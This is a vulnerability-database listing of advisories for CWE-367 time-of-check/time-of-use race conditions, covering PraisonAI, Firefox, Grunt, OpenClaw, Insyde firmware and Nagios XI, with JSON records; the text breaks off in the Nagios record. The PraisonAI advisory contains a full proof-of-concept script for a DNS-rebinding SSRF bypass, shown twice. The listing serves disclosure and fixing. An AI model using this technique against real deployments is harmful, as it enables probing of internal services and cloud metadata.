CWE-367
AllowedTime-of-check Time-of-use (TOCTOU) Race Condition
Abstraction: Base · Status: Incomplete
The product checks the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check.
1063 vulnerabilities reference this CWE, most recent first.
GHSA-RJVW-7VVW-549V
Vulnerability from github – Published: 2026-06-18 13:57 – Updated: 2026-06-18 13:57Jobs webhook SSRF protection bypass via DNS rebinding
Summary
PraisonAI's Async Jobs API validates webhook_url when a job request is parsed
and again when the internal Job object is constructed. That validation blocks
direct loopback/private targets, but it is not bound to the later network
request. When a job completes, _send_webhook() passes the original hostname to
httpx.AsyncClient.post() with no send-time validation, IP pinning, or guarded
transport.
An attacker-controlled hostname can therefore resolve to a public IP during Pydantic validation and later resolve to loopback/private/cloud-metadata infrastructure during webhook delivery. This bypasses the intended SSRF guard in current supported releases.
This appears to be an incomplete fix / patch bypass for GHSA-8frj-8q3m-xhgm
("Server-Side Request Forgery via Unvalidated webhook_url in Jobs API"). I defer
to maintainers on whether this should be a new advisory/CVE or an amendment to
the prior advisory, but current supported releases still appear affected.
Affected Component
Package:
praisonai
Files:
src/praisonai/praisonai/jobs/models.py
src/praisonai/praisonai/jobs/executor.py
src/praisonai/praisonai/jobs/router.py
Relevant code paths:
JobSubmitRequest.validate_webhook_url()
Job.validate_webhook_url()
JobExecutor._send_webhook()
POST /api/v1/runs
Affected Versions
Validated affected:
v4.5.126(f00763937bf7f4d091e84533692fc0576fca9b99);v4.5.128(b4e3a8a8);v4.6.56(d3c4a2af);v4.6.57(e90d92231853161ad931f3498da57651a9f8b528);- current
main(2f9677abb2ea68eab864ee8b6a828fd0141612e1,v4.6.57-4-g2f9677ab).
Suggested affected range for maintainer confirmation:
>= 4.5.126, <= 4.6.57
No patched version is known to me at submission time.
v4.5.124 and earlier are covered by the older unvalidated-webhook advisory.
This report is scoped to patched-era releases where direct loopback/private
webhook URLs are rejected but DNS rebinding still bypasses the guard.
Root Cause
Current validation is a time-of-check/time-of-use boundary:
JobSubmitRequest.webhook_urlis validated withurlparse()andsocket.gethostbyname().- The resolved address is rejected when it is private, loopback, link-local, or multicast.
- The original URL string is stored on the
Job. - After job completion,
_send_webhook()creates a freshhttpx.AsyncClientand POSTs to the original URL. httpxresolves the hostname again. There is no revalidation of the address that is actually connected to.
The first DNS answer is therefore trusted for a later, independent DNS lookup. An attacker who controls DNS for the webhook hostname can return a public address during validation and an internal address during delivery.
Local Reproduction
The PoV is local-only. It starts a loopback HTTP server, monkeypatches resolver
behavior in-process, and uses the real PraisonAI Job validator plus
JobExecutor._send_webhook() sender.
Run from a PraisonAI checkout:
env PYTHONPATH=src/praisonai python3 poc_jobs_webhook_dns_rebinding_ssrf.py
Observed output on current main:
DIRECT_LOOPBACK_BLOCKED: {"Job": true, "JobSubmitRequest": true}
ACCEPTED_WEBHOOK_URL: http://rebind.test:<port>/hook
INTERNAL_SERVER_HIT: true
INTERNAL_REQUEST_HOST: rebind.test:<port>
INTERNAL_REQUEST_PATH: /hook
WEBHOOK_PAYLOAD_KEYS: completed_at,duration_seconds,error,job_id,result,status
WEBHOOK_PAYLOAD_STATUS: succeeded
PRAI-CAND-005 CONFIRMED: Jobs webhook validation is bypassed by DNS rebinding
The direct control proves that the current guard is meant to reject loopback webhook destinations. The rebind case proves the same blocked destination class is reached when the hostname changes between validation and delivery.
Full Local PoV Script
#!/usr/bin/env python3
"""Local PoV for PraisonAI Jobs webhook DNS-rebinding SSRF.
The PoV uses only loopback services. It models an attacker-controlled hostname
that resolves to a public IP during PraisonAI's Pydantic validation, then
resolves to loopback when the async webhook sender later opens the connection.
"""
from __future__ import annotations
import asyncio
import json
import queue
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any
from praisonai.jobs.executor import JobExecutor
from praisonai.jobs.models import Job, JobSubmitRequest
ATTACKER_HOST = "rebind.test"
PUBLIC_IP = "93.184.216.34"
class InternalHandler(BaseHTTPRequestHandler):
def do_POST(self) -> None: # noqa: N802
length = int(self.headers.get("content-length", "0"))
body = self.rfile.read(length)
self.server.received.put( # type: ignore[attr-defined]
{
"path": self.path,
"host": self.headers.get("host"),
"body": body.decode("utf-8", "replace"),
}
)
self.send_response(204)
self.end_headers()
def log_message(self, *_args: Any) -> None:
return
def assert_direct_loopback_blocked(port: int) -> None:
blocked = {}
direct_url = f"http://127.0.0.1:{port}/hook"
for model in (JobSubmitRequest, Job):
try:
model(prompt="x", webhook_url=direct_url)
blocked[model.__name__] = False
except Exception:
blocked[model.__name__] = True
print("DIRECT_LOOPBACK_BLOCKED:", json.dumps(blocked, sort_keys=True))
if not all(blocked.values()):
raise SystemExit("control failed: direct loopback webhook URL was accepted")
def build_validated_job(port: int) -> Job:
original_gethostbyname = socket.gethostbyname
def validation_gethostbyname(host: str) -> str:
if host == ATTACKER_HOST:
return PUBLIC_IP
return original_gethostbyname(host)
socket.gethostbyname = validation_gethostbyname
try:
webhook_url = f"http://{ATTACKER_HOST}:{port}/hook"
request = JobSubmitRequest(prompt="x", webhook_url=webhook_url)
job = Job(prompt=request.prompt, webhook_url=request.webhook_url)
job.succeed({"pov": "job result sent to webhook"})
return job
finally:
socket.gethostbyname = original_gethostbyname
async def send_after_rebind(job: Job, port: int) -> None:
original_getaddrinfo = socket.getaddrinfo
def send_getaddrinfo(host: Any, port_arg: int, *args: Any, **kwargs: Any):
normalized_host = host.decode() if isinstance(host, bytes) else host
if normalized_host == ATTACKER_HOST:
return [
(
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP,
"",
("127.0.0.1", port_arg),
)
]
return original_getaddrinfo(host, port_arg, *args, **kwargs)
socket.getaddrinfo = send_getaddrinfo
try:
await JobExecutor(store=None)._send_webhook(job) # type: ignore[arg-type]
finally:
socket.getaddrinfo = original_getaddrinfo
def main() -> int:
received: queue.Queue[dict[str, str]] = queue.Queue()
server = HTTPServer(("127.0.0.1", 0), InternalHandler)
server.received = received # type: ignore[attr-defined]
port = int(server.server_port)
thread = threading.Thread(target=server.handle_request, daemon=True)
thread.start()
try:
assert_direct_loopback_blocked(port)
job = build_validated_job(port)
print("ACCEPTED_WEBHOOK_URL:", job.webhook_url)
asyncio.run(send_after_rebind(job, port))
finally:
server.server_close()
try:
hit = received.get_nowait()
except queue.Empty:
raise SystemExit("bypass failed: loopback-only webhook receiver was not hit")
payload = json.loads(hit["body"])
print("INTERNAL_SERVER_HIT: true")
print("INTERNAL_REQUEST_HOST:", hit["host"])
print("INTERNAL_REQUEST_PATH:", hit["path"])
print("WEBHOOK_PAYLOAD_KEYS:", ",".join(sorted(payload)))
print("WEBHOOK_PAYLOAD_STATUS:", payload.get("status"))
if hit["host"] != f"{ATTACKER_HOST}:{port}":
raise SystemExit("unexpected host header")
if payload.get("status") != "succeeded":
raise SystemExit("unexpected webhook payload")
print("PRAI-CAND-005 CONFIRMED: Jobs webhook validation is bypassed by DNS rebinding")
return 0
if __name__ == "__main__":
raise SystemExit(main())
Intended-Behavior Validation
PraisonAI's Async Jobs documentation describes webhook_url as the completion
callback URL for submitted jobs. The deploy API docs list webhooks as a key
feature and state that the async jobs API does not require authentication by
default, with authentication left to server deployment configuration.
The code also proves the intended safety boundary: both JobSubmitRequest and
Job currently reject direct http://127.0.0.1:<port>/... webhook URLs. The
PoV does not rely on local webhooks being intentionally allowed; it demonstrates
that a blocked local target becomes reachable after the validation-to-use DNS
transition.
Impact
If an attacker can submit jobs to a PraisonAI Jobs API deployment and choose
webhook_url, they can cause the PraisonAI host to send POST requests to
loopback, private-network, or cloud metadata endpoints reachable from that host.
Practical impact includes:
- blind interaction with internal HTTP services;
- internal host/port reachability probing via timing and webhook error behavior;
- POSTing attacker-controlled job result payloads to internal APIs with weak request validation;
- cloud metadata interaction where metadata endpoints accept the request method and the deployment network permits access.
This report does not claim response-body disclosure, RCE, or live credential theft without deployment-specific internal-service behavior. The SSRF primitive is still security-relevant because webhook delivery crosses a network boundary that current code explicitly tries to block.
Severity
Suggested severity: High for network-reachable Jobs API deployments where job submission is unauthenticated or attacker-accessible.
If maintainers model the Jobs API as loopback-only or authenticated in the affected deployment, severity may reasonably be reduced. I kept the primary rating aligned with the prior Jobs webhook SSRF advisory because PraisonAI's public docs state that authentication is not required by default and the same webhook sink remains reachable.
Suggested Fix
- Move SSRF validation to the send path immediately before opening the outbound connection.
- Resolve all candidate addresses with
socket.getaddrinfo(), not only the first IPv4 answer fromgethostbyname(). - Reject loopback, private, link-local, multicast, reserved, unspecified, and cloud metadata address ranges for every resolved address.
- Pin the validated address to the actual connection, or use a guarded HTTP transport/proxy that validates the destination after DNS resolution and before connect.
- Consider making Jobs API authentication mandatory by default for non-loopback binds, or require explicit opt-in to unauthenticated job submission.
- Add regression tests for direct loopback rejection, DNS rebind from public to loopback, IPv6/private AAAA records with public A records, and allowed public webhooks.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.6.58"
},
"package": {
"ecosystem": "PyPI",
"name": "praisonai"
},
"ranges": [
{
"events": [
{
"introduced": "4.5.126"
},
{
"fixed": "4.6.59"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-367",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T13:57:20Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "# Jobs webhook SSRF protection bypass via DNS rebinding\n\n## Summary\n\nPraisonAI\u0027s Async Jobs API validates `webhook_url` when a job request is parsed\nand again when the internal `Job` object is constructed. That validation blocks\ndirect loopback/private targets, but it is not bound to the later network\nrequest. When a job completes, `_send_webhook()` passes the original hostname to\n`httpx.AsyncClient.post()` with no send-time validation, IP pinning, or guarded\ntransport.\n\nAn attacker-controlled hostname can therefore resolve to a public IP during\nPydantic validation and later resolve to loopback/private/cloud-metadata\ninfrastructure during webhook delivery. This bypasses the intended SSRF guard in\ncurrent supported releases.\n\nThis appears to be an incomplete fix / patch bypass for `GHSA-8frj-8q3m-xhgm`\n(\"Server-Side Request Forgery via Unvalidated webhook_url in Jobs API\"). I defer\nto maintainers on whether this should be a new advisory/CVE or an amendment to\nthe prior advisory, but current supported releases still appear affected.\n\n## Affected Component\n\nPackage:\n\n```text\npraisonai\n```\n\nFiles:\n\n```text\nsrc/praisonai/praisonai/jobs/models.py\nsrc/praisonai/praisonai/jobs/executor.py\nsrc/praisonai/praisonai/jobs/router.py\n```\n\nRelevant code paths:\n\n```text\nJobSubmitRequest.validate_webhook_url()\nJob.validate_webhook_url()\nJobExecutor._send_webhook()\nPOST /api/v1/runs\n```\n\n## Affected Versions\n\nValidated affected:\n\n- `v4.5.126` (`f00763937bf7f4d091e84533692fc0576fca9b99`);\n- `v4.5.128` (`b4e3a8a8`);\n- `v4.6.56` (`d3c4a2af`);\n- `v4.6.57` (`e90d92231853161ad931f3498da57651a9f8b528`);\n- current `main` (`2f9677abb2ea68eab864ee8b6a828fd0141612e1`,\n `v4.6.57-4-g2f9677ab`).\n\nSuggested affected range for maintainer confirmation:\n\n```text\n\u003e= 4.5.126, \u003c= 4.6.57\n```\n\nNo patched version is known to me at submission time.\n\n`v4.5.124` and earlier are covered by the older unvalidated-webhook advisory.\nThis report is scoped to patched-era releases where direct loopback/private\nwebhook URLs are rejected but DNS rebinding still bypasses the guard.\n\n## Root Cause\n\nCurrent validation is a time-of-check/time-of-use boundary:\n\n1. `JobSubmitRequest.webhook_url` is validated with `urlparse()` and\n `socket.gethostbyname()`.\n2. The resolved address is rejected when it is private, loopback, link-local, or\n multicast.\n3. The original URL string is stored on the `Job`.\n4. After job completion, `_send_webhook()` creates a fresh `httpx.AsyncClient`\n and POSTs to the original URL.\n5. `httpx` resolves the hostname again. There is no revalidation of the address\n that is actually connected to.\n\nThe first DNS answer is therefore trusted for a later, independent DNS lookup.\nAn attacker who controls DNS for the webhook hostname can return a public\naddress during validation and an internal address during delivery.\n\n## Local Reproduction\n\nThe PoV is local-only. It starts a loopback HTTP server, monkeypatches resolver\nbehavior in-process, and uses the real PraisonAI `Job` validator plus\n`JobExecutor._send_webhook()` sender.\n\nRun from a PraisonAI checkout:\n\n```fish\nenv PYTHONPATH=src/praisonai python3 poc_jobs_webhook_dns_rebinding_ssrf.py\n```\n\nObserved output on current `main`:\n\n```text\nDIRECT_LOOPBACK_BLOCKED: {\"Job\": true, \"JobSubmitRequest\": true}\nACCEPTED_WEBHOOK_URL: http://rebind.test:\u003cport\u003e/hook\nINTERNAL_SERVER_HIT: true\nINTERNAL_REQUEST_HOST: rebind.test:\u003cport\u003e\nINTERNAL_REQUEST_PATH: /hook\nWEBHOOK_PAYLOAD_KEYS: completed_at,duration_seconds,error,job_id,result,status\nWEBHOOK_PAYLOAD_STATUS: succeeded\nPRAI-CAND-005 CONFIRMED: Jobs webhook validation is bypassed by DNS rebinding\n```\n\nThe direct control proves that the current guard is meant to reject loopback\nwebhook destinations. The rebind case proves the same blocked destination class\nis reached when the hostname changes between validation and delivery.\n\n## Full Local PoV Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Local PoV for PraisonAI Jobs webhook DNS-rebinding SSRF.\n\nThe PoV uses only loopback services. It models an attacker-controlled hostname\nthat resolves to a public IP during PraisonAI\u0027s Pydantic validation, then\nresolves to loopback when the async webhook sender later opens the connection.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport json\nimport queue\nimport socket\nimport threading\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom typing import Any\n\nfrom praisonai.jobs.executor import JobExecutor\nfrom praisonai.jobs.models import Job, JobSubmitRequest\n\n\nATTACKER_HOST = \"rebind.test\"\nPUBLIC_IP = \"93.184.216.34\"\n\n\nclass InternalHandler(BaseHTTPRequestHandler):\n def do_POST(self) -\u003e None: # noqa: N802\n length = int(self.headers.get(\"content-length\", \"0\"))\n body = self.rfile.read(length)\n self.server.received.put( # type: ignore[attr-defined]\n {\n \"path\": self.path,\n \"host\": self.headers.get(\"host\"),\n \"body\": body.decode(\"utf-8\", \"replace\"),\n }\n )\n self.send_response(204)\n self.end_headers()\n\n def log_message(self, *_args: Any) -\u003e None:\n return\n\n\ndef assert_direct_loopback_blocked(port: int) -\u003e None:\n blocked = {}\n direct_url = f\"http://127.0.0.1:{port}/hook\"\n for model in (JobSubmitRequest, Job):\n try:\n model(prompt=\"x\", webhook_url=direct_url)\n blocked[model.__name__] = False\n except Exception:\n blocked[model.__name__] = True\n\n print(\"DIRECT_LOOPBACK_BLOCKED:\", json.dumps(blocked, sort_keys=True))\n if not all(blocked.values()):\n raise SystemExit(\"control failed: direct loopback webhook URL was accepted\")\n\n\ndef build_validated_job(port: int) -\u003e Job:\n original_gethostbyname = socket.gethostbyname\n\n def validation_gethostbyname(host: str) -\u003e str:\n if host == ATTACKER_HOST:\n return PUBLIC_IP\n return original_gethostbyname(host)\n\n socket.gethostbyname = validation_gethostbyname\n try:\n webhook_url = f\"http://{ATTACKER_HOST}:{port}/hook\"\n request = JobSubmitRequest(prompt=\"x\", webhook_url=webhook_url)\n job = Job(prompt=request.prompt, webhook_url=request.webhook_url)\n job.succeed({\"pov\": \"job result sent to webhook\"})\n return job\n finally:\n socket.gethostbyname = original_gethostbyname\n\n\nasync def send_after_rebind(job: Job, port: int) -\u003e None:\n original_getaddrinfo = socket.getaddrinfo\n\n def send_getaddrinfo(host: Any, port_arg: int, *args: Any, **kwargs: Any):\n normalized_host = host.decode() if isinstance(host, bytes) else host\n if normalized_host == ATTACKER_HOST:\n return [\n (\n socket.AF_INET,\n socket.SOCK_STREAM,\n socket.IPPROTO_TCP,\n \"\",\n (\"127.0.0.1\", port_arg),\n )\n ]\n return original_getaddrinfo(host, port_arg, *args, **kwargs)\n\n socket.getaddrinfo = send_getaddrinfo\n try:\n await JobExecutor(store=None)._send_webhook(job) # type: ignore[arg-type]\n finally:\n socket.getaddrinfo = original_getaddrinfo\n\n\ndef main() -\u003e int:\n received: queue.Queue[dict[str, str]] = queue.Queue()\n server = HTTPServer((\"127.0.0.1\", 0), InternalHandler)\n server.received = received # type: ignore[attr-defined]\n port = int(server.server_port)\n thread = threading.Thread(target=server.handle_request, daemon=True)\n thread.start()\n\n try:\n assert_direct_loopback_blocked(port)\n job = build_validated_job(port)\n print(\"ACCEPTED_WEBHOOK_URL:\", job.webhook_url)\n asyncio.run(send_after_rebind(job, port))\n finally:\n server.server_close()\n\n try:\n hit = received.get_nowait()\n except queue.Empty:\n raise SystemExit(\"bypass failed: loopback-only webhook receiver was not hit\")\n\n payload = json.loads(hit[\"body\"])\n print(\"INTERNAL_SERVER_HIT: true\")\n print(\"INTERNAL_REQUEST_HOST:\", hit[\"host\"])\n print(\"INTERNAL_REQUEST_PATH:\", hit[\"path\"])\n print(\"WEBHOOK_PAYLOAD_KEYS:\", \",\".join(sorted(payload)))\n print(\"WEBHOOK_PAYLOAD_STATUS:\", payload.get(\"status\"))\n\n if hit[\"host\"] != f\"{ATTACKER_HOST}:{port}\":\n raise SystemExit(\"unexpected host header\")\n if payload.get(\"status\") != \"succeeded\":\n raise SystemExit(\"unexpected webhook payload\")\n\n print(\"PRAI-CAND-005 CONFIRMED: Jobs webhook validation is bypassed by DNS rebinding\")\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n```\n\n## Intended-Behavior Validation\n\nPraisonAI\u0027s Async Jobs documentation describes `webhook_url` as the completion\ncallback URL for submitted jobs. The deploy API docs list webhooks as a key\nfeature and state that the async jobs API does not require authentication by\ndefault, with authentication left to server deployment configuration.\n\nThe code also proves the intended safety boundary: both `JobSubmitRequest` and\n`Job` currently reject direct `http://127.0.0.1:\u003cport\u003e/...` webhook URLs. The\nPoV does not rely on local webhooks being intentionally allowed; it demonstrates\nthat a blocked local target becomes reachable after the validation-to-use DNS\ntransition.\n\n## Impact\n\nIf an attacker can submit jobs to a PraisonAI Jobs API deployment and choose\n`webhook_url`, they can cause the PraisonAI host to send POST requests to\nloopback, private-network, or cloud metadata endpoints reachable from that host.\n\nPractical impact includes:\n\n- blind interaction with internal HTTP services;\n- internal host/port reachability probing via timing and webhook error behavior;\n- POSTing attacker-controlled job result payloads to internal APIs with weak\n request validation;\n- cloud metadata interaction where metadata endpoints accept the request method\n and the deployment network permits access.\n\nThis report does not claim response-body disclosure, RCE, or live credential\ntheft without deployment-specific internal-service behavior. The SSRF primitive\nis still security-relevant because webhook delivery crosses a network boundary\nthat current code explicitly tries to block.\n\n## Severity\n\nSuggested severity: High for network-reachable Jobs API deployments where job\nsubmission is unauthenticated or attacker-accessible.\n\nIf maintainers model the Jobs API as loopback-only or authenticated in the\naffected deployment, severity may reasonably be reduced. I kept the primary\nrating aligned with the prior Jobs webhook SSRF advisory because PraisonAI\u0027s\npublic docs state that authentication is not required by default and the same\nwebhook sink remains reachable.\n\n## Suggested Fix\n\n- Move SSRF validation to the send path immediately before opening the outbound\n connection.\n- Resolve all candidate addresses with `socket.getaddrinfo()`, not only the\n first IPv4 answer from `gethostbyname()`.\n- Reject loopback, private, link-local, multicast, reserved, unspecified, and\n cloud metadata address ranges for every resolved address.\n- Pin the validated address to the actual connection, or use a guarded HTTP\n transport/proxy that validates the destination after DNS resolution and before\n connect.\n- Consider making Jobs API authentication mandatory by default for non-loopback\n binds, or require explicit opt-in to unauthenticated job submission.\n- Add regression tests for direct loopback rejection, DNS rebind from public to\n loopback, IPv6/private AAAA records with public A records, and allowed public\n webhooks.",
"id": "GHSA-rjvw-7vvw-549v",
"modified": "2026-06-18T13:57:20Z",
"published": "2026-06-18T13:57:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rjvw-7vvw-549v"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI: Jobs webhook SSRF protection bypass via DNS rebinding"
}
GHSA-RJWC-235R-8986
Vulnerability from github – Published: 2024-07-09 15:30 – Updated: 2024-10-30 21:30A race condition could lead to a cross-origin container obtaining permissions of the top-level origin. This vulnerability affects Firefox < 128 and Firefox ESR < 115.13.
{
"affected": [],
"aliases": [
"CVE-2024-6601"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-09T15:15:12Z",
"severity": "MODERATE"
},
"details": "A race condition could lead to a cross-origin container obtaining permissions of the top-level origin. This vulnerability affects Firefox \u003c 128 and Firefox ESR \u003c 115.13.",
"id": "GHSA-rjwc-235r-8986",
"modified": "2024-10-30T21:30:37Z",
"published": "2024-07-09T15:30:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6601"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1890748"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2024-29"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2024-30"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2024-31"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2024-32"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-RM36-94G8-835R
Vulnerability from github – Published: 2022-05-11 00:01 – Updated: 2022-05-25 19:30file.copy operations in GruntJS are vulnerable to a TOCTOU race condition leading to arbitrary file write in GitHub repository gruntjs/grunt prior to 1.5.3. This vulnerability is capable of arbitrary file writes which can lead to local privilege escalation to the GruntJS user if a lower-privileged user has write access to both source and destination directories as the lower-privileged user can create a symlink to the GruntJS user's .bashrc file or replace /etc/shadow file if the GruntJS user is root.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "grunt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-1537"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": true,
"github_reviewed_at": "2022-05-25T19:30:09Z",
"nvd_published_at": "2022-05-10T14:15:00Z",
"severity": "HIGH"
},
"details": "file.copy operations in GruntJS are vulnerable to a TOCTOU race condition leading to arbitrary file write in GitHub repository gruntjs/grunt prior to 1.5.3. This vulnerability is capable of arbitrary file writes which can lead to local privilege escalation to the GruntJS user if a lower-privileged user has write access to both source and destination directories as the lower-privileged user can create a symlink to the GruntJS user\u0027s .bashrc file or replace /etc/shadow file if the GruntJS user is root.",
"id": "GHSA-rm36-94g8-835r",
"modified": "2022-05-25T19:30:09Z",
"published": "2022-05-11T00:01:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1537"
},
{
"type": "WEB",
"url": "https://github.com/gruntjs/grunt/commit/58016ffac5ed9338b63ecc2a63710f5027362bae"
},
{
"type": "PACKAGE",
"url": "https://github.com/gruntjs/grunt"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/0179c3e5-bc02-4fc9-8491-a1a319b51b4d"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00006.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Race Condition in Grunt"
}
GHSA-RM5C-4RMF-VVHW
Vulnerability from github – Published: 2026-04-03 03:01 – Updated: 2026-04-03 20:16Summary
Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses
Current Maintainer Triage
- Status: narrow
- Normalized severity: medium
- Assessment: Released workspace-only apply_patch remove and mkdir operations were still check-then-act, but the draft overstates scope by bundling broader edit paths; keep it open but narrow it to the actual sandbox-workspace mutation boundary.
Affected Packages / Versions
- Package:
openclaw(npm) - Latest published npm version:
2026.3.31 - Vulnerable version range:
<=2026.3.28 - Patched versions:
>= 2026.3.31 - First stable tag containing the fix:
v2026.3.31
Fix Commit(s)
32a4a47d602e0618f87b3e59f94d8c142767f860— 2026-03-30T16:49:49+01:00
OpenClaw thanks @AntAISecurityLab for reporting.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2026.3.28"
},
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.3.31"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T03:01:57Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\nSandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Released workspace-only apply_patch remove and mkdir operations were still check-then-act, but the draft overstates scope by bundling broader edit paths; keep it open but narrow it to the actual sandbox-workspace mutation boundary.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `\u003c=2026.3.28`\n- Patched versions: `\u003e= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `32a4a47d602e0618f87b3e59f94d8c142767f860` \u2014 2026-03-30T16:49:49+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
"id": "GHSA-rm5c-4rmf-vvhw",
"modified": "2026-04-03T20:16:01Z",
"published": "2026-04-03T03:01:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm5c-4rmf-vvhw"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/32a4a47d602e0618f87b3e59f94d8c142767f860"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses"
}
GHSA-RMC8-MGM5-RJJH
Vulnerability from github – Published: 2023-02-15 03:30 – Updated: 2023-02-23 18:31An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the HddPassword shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for the ACPI runtime memory used for the command buffer. This attack can be mitigated by copying the firmware block services data to SMRAM before checking it.
{
"affected": [],
"aliases": [
"CVE-2022-32473"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-02-15T03:15:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. DMA attacks on the HddPassword shared buffer used by SMM and non-SMM code could cause TOCTOU race-condition issues that could lead to corruption of SMRAM and escalation of privileges. This attack can be mitigated using IOMMU protection for the ACPI runtime memory used for the command buffer. This attack can be mitigated by copying the firmware block services data to SMRAM before checking it.",
"id": "GHSA-rmc8-mgm5-rjjh",
"modified": "2023-02-23T18:31:06Z",
"published": "2023-02-15T03:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32473"
},
{
"type": "WEB",
"url": "https://www.insyde.com/security-pledge"
},
{
"type": "WEB",
"url": "https://www.insyde.com/security-pledge/SA-2023005"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RMP9-WCQ5-WFF8
Vulnerability from github – Published: 2025-10-31 00:30 – Updated: 2025-11-06 15:31Nagios XI versions prior to 2011R1.9 contain privilege escalation vulnerabilities in the scripts that install or update system crontab entries. Due to time-of-check/time-of-use race conditions and missing synchronization or final-path validation, a local low-privileged user could manipulate filesystem state during crontab installation to influence the files or commands executed with elevated privileges, resulting in execution with higher privileges.
{
"affected": [],
"aliases": [
"CVE-2011-10035"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-30T22:15:34Z",
"severity": "HIGH"
},
"details": "Nagios XI versions prior to\u00a02011R1.9\u00a0contain privilege escalation vulnerabilities in the scripts that install or update system crontab entries. Due to time-of-check/time-of-use\u00a0race conditions and missing synchronization or final-path validation, a local low-privileged user could manipulate filesystem state during crontab installation to influence the files or commands executed with elevated privileges, resulting in execution with higher privileges.",
"id": "GHSA-rmp9-wcq5-wff8",
"modified": "2025-11-06T15:31:02Z",
"published": "2025-10-31T00:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10035"
},
{
"type": "WEB",
"url": "https://www.nagios.com/changelog/nagios-xi"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/nagios-xi-race-conditions-in-crontab-install-script-lpe"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
